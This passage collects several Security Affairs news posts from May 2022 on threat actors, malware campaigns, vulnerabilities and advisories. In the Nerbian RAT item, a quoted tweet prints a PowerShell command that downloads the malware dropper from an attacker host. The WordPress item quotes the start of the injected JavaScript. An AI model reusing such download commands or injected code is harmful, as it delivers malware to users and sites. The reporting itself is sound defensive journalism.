In Cluster A, the APT group use BitLocker and DiskCryptor to conduct financially motivated opportunistic ransomware attacks. Cluster B focuses on targeted attacks for intelligence purposes, but experts observed some attacks deploying ransomware.

Most of the victims are in Israel, the U.S., Europe, and Australia. The threat actors obtain initial access by scanning servers exposed online and exploiting known vulnerabilities such as Fortinet FortiOS vulnerabilities CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591. Starting from late September 2021, the group was observed targeting Microsoft Exchange servers by exploiting the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to deploy Fast Reverse Proxy client (FRPC) and gain remote access to the systems.

The researchers have also observed COBALT MIRAGE using at the end of December an unfinished attempt at ransomware, while their infrastructure was hosting files related to to the HiddenTear open-source ransomware project, the latter has yet to be used by the group in attacks in the wild.

“The January and March incidents typify the different styles of attacks conducted by COBALT MIRAGE. While the threat actors appear to have had a reasonable level of success gaining initial access to a wide range of targets, their ability to capitalize on that access for financial gain or intelligence collection appears limited.” concludes the report. “At a minimum, COBALT MIRAGE’s ability to use publicly available encryption tools for ransomware operations and mass scan-and-exploit activity to compromise organizations creates an ongoing threat.”

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, COBALT MIRAGE)

The post Iran-linked COBALT MIRAGE group uses ransomware in its operations appeared first on Security Affairs.

Categories: Cyber Security News

New Nerbian RAT spreads via malspam campaigns using COVID-19

Thu, 05/12/2022 - 16:52
Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques.

Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated anti-analysis and anti-reversing capabilities.

The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The name of the RAT comes from a named function in the source code of the malware, Nerbia is a fictional place from the novel Don Quixote

The Nerbian RAT is written in Go programming language, compiled for 64-bit systems, to make the malware multiplatform.

The malspam campaign spotted by Proofpoint started on April 26 and targeted multiple industries.

“Starting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware campaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.” reads the analysis published by Proofpoint “The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.” 

Any ideas? – #WHO#COVID19 themed lure

powershell IWR -Uri https://www.fernandestechnical.]com/pub/media/gitlog -OutFile C:UsersAdminAppDataRoamingUpdateUAV.exehttps://t.co/cQf1KK6UEt pic.twitter.com/bAbXJRM0ti

— proxylife (@pr0xylife) April 28, 2022

The emails contain a weaponized Word attachment, which is sometimes compressed with RAR. Upon enabling the macros, the document provided reveals information relating to COVID-19 safety, specifically about measures for self-isolation of infected individuals.

The document contains logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).

Once opened the document and enabled the macro, a bat file executes a PowerShell acting as downloader for a Goland 64-bit dropper named “UpdateUAV.exe”.

The UpdateUAV executable is a dropper for the Nerbian RAT and borrows the code from various GitHub projects.

The Nerbian RAT supports a variety of different functions, such as logging keystrokes and capturing images of the screen, and handle communications over SSL.

“Proofpoint assesses with high confidence that the dropper and RAT were both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the dropper is statically configured to download and establish persistence for this specific payload at the time of analysis.” concludes the report that includes indicators of compromise (IoCs).

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, RAT)

The post New Nerbian RAT spreads via malspam campaigns using COVID-19 appeared first on Security Affairs.

Categories: Cyber Security News

Massive hacking campaign compromised thousands of WordPress websites

Thu, 05/12/2022 - 09:57
Researchers uncovered a massive hacking campaign that compromised thousands of WordPress websites to redirect visitors to scam sites.

Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript code that redirects visitors to scam content.

The infections automatically redirect site visitors to third-party websites containing malicious content (i.e. phishing pages, malware downloads), scam pages, or commercial websites to generate illegitimate traffic.

“The websites all shared a common issue — malicious JavaScript had been injected within their website’s files and the database, including legitimate core WordPress files, such as:

  • ./wp-includes/js/jquery/jquery.min.js
  • ./wp-includes/js/jquery/jquery-migrate.min.js

“Once the website had been compromised, attackers had attempted to automatically infect any .js files with jQuery in the names. They injected code that begins with “/* trackmyposs*/eval(String.fromCharCode…” reads the analysis published by Sucuri.

In some attacks, users were redirected to a landing page containing a CAPTCHA check. Upon clicking on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open.

The ads will look like they are generated from the operating system and not from a browser.

According to Sucuri, at least 322 websites were compromised as a result of this new wave of attacks and were observed redirecting visitors to the malicious website drakefollow[.]com.

“Our team has seen an influx in complaints for this specific wave of the massive campaign targeting WordPress sites beginning May 9th, 2022, which has impacted hundreds of websites already at the time of writing.” concludes the report. “It has been found that attackers are targeting multiple vulnerabilities in WordPress plugins and themes to compromise the website and inject their malicious scripts. We expect the hackers will continue registering new domains for this ongoing campaign as soon as existing ones become blacklisted.”

Website admins could check if their websites have been compromised by using Sucuri’s free remote website scanner.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress websites)

The post Massive hacking campaign compromised thousands of WordPress websites appeared first on Security Affairs.

Categories: Cyber Security News

Red TIM Research (RTR) founds 2 bugs affecting F5 Traffix SDC

Thu, 05/12/2022 - 08:00
Experts at TIM research laboratory, Red Team Research (RTR), have disclosed a couple of bugs affecting F5 Traffix SDC.

Among these 45 bugs fixed by the well-known manufacturer of computer security systems, 2 were detected by TIM research laboratory, Red Team Research (RTR), as part of the bug hunting activities, on the F5® Traffix® Signaling Delivery Controller (SDC) solution.

F5 Traffix Signaling Delivery Controller

F5® Traffix® Signaling Delivery Controller (SDC) solution helps operators to scale and manage services and applications in 4G/LTE networks.

It also allows the routing and exchange of data between different protocols, such as Diameter, SS7, HTTP etc. It uses an advanced transformation and flow management engine while satisfying the increasing demand for services and broadband subscribers.

SDC solution can be configured and monitored through a web user interface that has been detected as vulnerable to 2 security bugs found by Red TIM Research recently.

According to the institutional website https:///www.gruppotim.it/redteam, once these vulnerabilities were identified, researchers Valerio Alessandroni and Matteo Brutti immediately started the process of Coordinated Vulnerability Disclosure (CVD) with Massimiliano Brolli, leading the project, by publishing only after the availability of the fixes made by the Vendor.

Detected 0day Overview

Below are the bugs detected on F5 SDC that have been published on the institutional website, available at this address: https://www.gruppotim.it/redteam

CVE-2022-27880
  • Vulnerability Description: Stored Cross-Site Scripting – CWE-79
  • Software Version: 5.1.0, 5.2.0
  • NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27880
  • CVSv3: TBD
  • Severity: TBD
  • The Web application of F5 SDC doesn’t check properly the parameters sent as input in HTTP requests, before saving them in the server. In addition, the JavaScript malicious content is then reflected back to the end user and executed by the web browser.
CVE-2022-27662
  • Vulnerability Description: Stored Client-Side Template Injection-CWE-1336
  • Software Version: 5.1.0, 5.2.0
  • NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-27662
  • CVSv3: TBD
  • Severity: TBD
  • In Traffix Signal Delivery Controller 5.1.0 and 5.2.0, stored client-side template injection (CSTI) was possible, which could lead to code execution.
Tim Red Team Research

We are talking about one of the few Italian centers of industrial research about security bugs, where since few years are performed “bug hunting” activities that aim to search for undocumented vulnerabilities, leading to a subsequent issuance of a Common Vulnerabilities and Exposures (CVE) on the National Vulnerability Database of the United States of America, once the Coordinated Vulnerability Disclosure (CVD) with the Vendor is over.

In two years of activity, the team has detected many 0-days on very popular products of big vendors, such as Oracle, IBM, Ericsson, Nokia, Computer Associates, Siemens, QNAP, Johnson & Control, Schneider Electric, as well as other vendors on different types of software architectures.

In two years, more than 70 CVEs have been published, 4 of them with a Critical severity (9.8 of CVSSv3 scores), 23 of them with a High severity and 36 of them with a Medium severity.

Speaking about a vulnerability detected on Johnson & Control’s Metasys Reporting Engine (MRE) Web Services Product, Cybersecurity and Infrastructure Security Agency (CISA) of the United States of America issued a specific Security Bulletin reporting as Background the following sectors: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/ AREAS USED and COMPANY HEADQUARTERS”.

It is an all-Italian reality that issues a CVE every 6 working days, internationally contributing to the research for undocumented vulnerabilities, contributing to the security of the products used by many organizations and several individuals.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, F5 Traffix)

The post Red TIM Research (RTR) founds 2 bugs affecting F5 Traffix SDC appeared first on Security Affairs.

Categories: Cyber Security News

Five Eyes agencies warn of attacks on MSPs

Thu, 05/12/2022 - 06:10
Cybersecurity authorities from Five Eye warn of threats targeting managed service providers (MSPs) and potential supply chain attacks through them.

Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. this week released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers.

“The cybersecurity authorities of the United Kingdom, Australia, Canada, New Zealand, and the United States have released joint Cybersecurity Advisory (CSA), Protecting Against Cyber Threats to Managed Service Providers and their Customers, to provide guidance on how to protect against malicious cyber activity targeting managed service providers (MSPs) and their customers.” reads the joint advisory. “The CSA—created in response to reports of increased activity against MSPs and their customers—provides specific guidance for both MSPs and customers aimed at enabling transparent discussions on securing sensitive data.”

The alert provides tactical actions for MSPs and customers, including:

  • Identify and disable accounts that are no longer in use.
  • Enforce MFA on MSP accounts that access the customer environment and monitor for unexplained failed authentication.
  • Ensure MSP-customer contracts transparently identify ownership of information and communications technology (ICT) security roles and responsibilities.

MSPs are a privileged target for both, nation-state actors and cybercriminals, that once compromised their infrastructure could ultimately attack the customers’ infrastructure by exploiting their access.

The Five Eyes agencies warn of supply chain attacks targeting MSPs and that could impact their customers, such as the SolarWinds attacks.

Below is the list of recommendations included in the guidance:

Prevent initial compromise

  • Improve security of vulnerable devices.
  • Protect internet-facing services
  • Defend against brute force and password spraying
  • Defend against phishing

Enable/improve monitoring and logging processes

Enforce multifactor authentication (MFA)

Manage internal architecture risks and segregate internal networks

Apply the principle of least privilege

Deprecate obsolete accounts and infrastructure

Apply updates

Backup systems and data

Develop and exercise incident response and recovery plans

Understand and proactively manage supply chain risk

Promote transparency

Manage account authentication and authorization

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, MSPs)

The post Five Eyes agencies warn of attacks on MSPs appeared first on Security Affairs.

Categories: Cyber Security News

CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog

Wed, 05/11/2022 - 17:45
US Critical Infrastructure Security Agency (CISA) adds critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Last week security and application delivery solutions provider F5 released its security notification to inform customers that it has released security updates from tens of vulnerabilities in its products.

The company addressed a total of 43 vulnerabilities, the most severe one is a critical issue tracked as CVE-2022-1388 (CVSS score of 9.8). An unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses can exploit the CVE-2022-1388 flaw to execute arbitrary system commands, create or delete files, or disable services.

“This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.” reads the advisory published by the vendor.”

The flaw affects the following versions:

16.1.0 – 16.1.2
15.1.0 – 15.1.5
14.1.0 – 14.1.4
13.1.0 – 13.1.4
12.1.0 – 12.1.6
11.6.1 – 11.6.5

and the vendor addressed it with the release of:

17.0.0
16.1.2.2
15.1.5.1
14.1.4.6
13.1.5

The company provided the following temporary mitigations for customers that cannot install the patched versions:

Researchers from Positive Technologies and Horizon3 Attack Team developed their own exploit code for CVE-2022-1388 and explained that the issue is trivial to exploit.

This week multiple experts confirmed that threat actors started massively exploiting the critical remote code execution vulnerability.

In most of the attacks, threat actors exploited the issue to drop webshells, but BleepingComputer reported that the F5 BIG-IP vulnerability was also exploited to wipe devices.

SANS Internet Storm Center observed at least two attacks that targeted BIG-IP devices to wipe them.

The popular researcher Kevin Beaumont also confirmed that threat actors are exploiting the flaw to erase BIG-IP devices.

Can confirm. Real world devices are being erased this evening, lots on Shodan have stopped responding. https://t.co/Rb7cyD2cnR

— Kevin Beaumont (@GossiTheDog) May 10, 2022

The CVE-2022-1388 issue has to be addressed by federal agencies by May 31, 2022.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2022-1388)

The post CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack

Wed, 05/11/2022 - 02:11
Microsoft Patch Tuesday security updates for May 2022 address three zero-day vulnerabilities, one of them actively exploited.

Microsoft Patch Tuesday security updates for May 2022 addressed three zero-day vulnerabilities, one of which is under active attack.

The IT giant fixed a total of 74 flaws in Microsoft Windows and Windows Components, .NET and Visual Studio, Microsoft Edge (Chromium-based), Microsoft Exchange Server, Office and Office Components, Windows Hyper-V, Windows Authentication Methods, BitLocker, Windows Cluster Shared Volume (CSV), Remote Desktop Client, Windows Network File System, NTFS, and Windows Point-to-Point Tunneling Protocol.

Of the 74 flaws addressed by the company, seven are rated Critical, 66 are rated Important, and one is rated Low in severity. Seven of these issues were reported through the ZDI program.

The zero-day flaw under active attack, tracked as ‘CVE-2022-26925, is a Windows LSA Spoofing vulnerability.

The flaw can be exploited by an unauthenticated attacker to force a domain controller to authenticate against another server using NTLM.

“An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. This security update detects anonymous connection attempts in LSARPC and disallows it.” read the advisory published by Microsoft.

The other zero-day issues addressed by Microsoft are a Windows Hyper-V Denial of Service flaw, tracked as CVE-2022-22713 and Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver.

The company also fixed a Windows Network File System Remote Code Execution Vulnerability, tracked as CVE-2022-26937. Remote, unauthenticated attackers can exploit the issue to execute code in the context of the Network File System (NFS) service on affected systems. Experts pointed out that NFS isn’t enabled by default, but it’s a common option in environments where Windows systems are other OSes coexist.

The complete list of vulnerabilities addressed with the release of Microsoft Patch Tuesday security updates for May 2022 is available here.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Patch Tuesday security updates for May 2022)

The post Microsoft Patch Tuesday updates for May 2022 fixes 3 zero-days, 1 under active attack appeared first on Security Affairs.

Categories: Cyber Security News

EU condemns Russian cyber operations against Ukraine

Wed, 05/11/2022 - 02:03
The European Union condemns the cyberattacks conducted by Russia against Ukraine, which targeted the satellite KA-SAT network.

The European Union accused Russia of the cyberattack that hit the satellite KA-SAT network in Ukraine, operated by Viasat, on February 24.

This cyberattack caused communication outages and disruptions in Ukraine, it also impacted several EU Member States. 5,800 Enercon wind turbines in Germany were unreachable due to the spillover from this attack. Security researchers at SentinelLabs who investigated the attack spotted a previously undetected destructive wiper, tracked as AcidRain, that hit routers and modems

“The European Union and its Member States, together with its international partners, strongly condemn the malicious cyber activity conducted by the Russian Federation against Ukraine, which targeted the satellite KA-SAT network, operated by Viasat.” reads the press release published by the European Union.

“This unacceptable cyberattack is yet another example of Russia’s continued pattern of irresponsible behaviour in cyberspace, which also formed an integral part of its illegal and unjustified invasion of Ukraine.”

UN Member States pointed out that the conduct of the Russian Federation in cyberspace is not respecting the norms of responsible state behavior in the fifth domain of warfare.

EU members argued that cyberattacks targeting Ukraine could spill over into other countries and pose European critical infrastructure, businesses and citizens at risk.

“The European Union, working closely with its partners, is considering further steps to prevent, discourage, deter and respond to such malicious behavior in cyberspace. The European Union will continue to provide coordinated political, financial and material support to Ukraine to strengthen its cyber resilience.” concludes the press release. “Russia must stop this war and bring an end to the senseless human suffering immediately.”

Foreign, Commonwealth & Development Office and The Rt Hon Elizabeth Truss MP also published a statement that formally accuses Russia of attacks against Ukraine an hour before the invasion.

“Russia has been behind a series of cyber-attacks since the start of the renewed invasion of Ukraine, the EU, UK, US and other allies have announced today (10 May). The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent, disrupting wind farms and internet users in central Europe.” reads the statement.

Please vote for Security Affairs as the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS
Vote for me in the sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog” and others of your choice.
To nominate, please visit: 
https://docs.google.com/forms/d/e/1FAIpQLSfxxrxICiMZ9QM9iiPuMQIC-IoM-NpQMOsFZnJXrBQRYJGCOw/viewform  

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)

The post EU condemns Russian cyber operations against Ukraine appeared first on Security Affairs.

Categories: Cyber Security News

Pages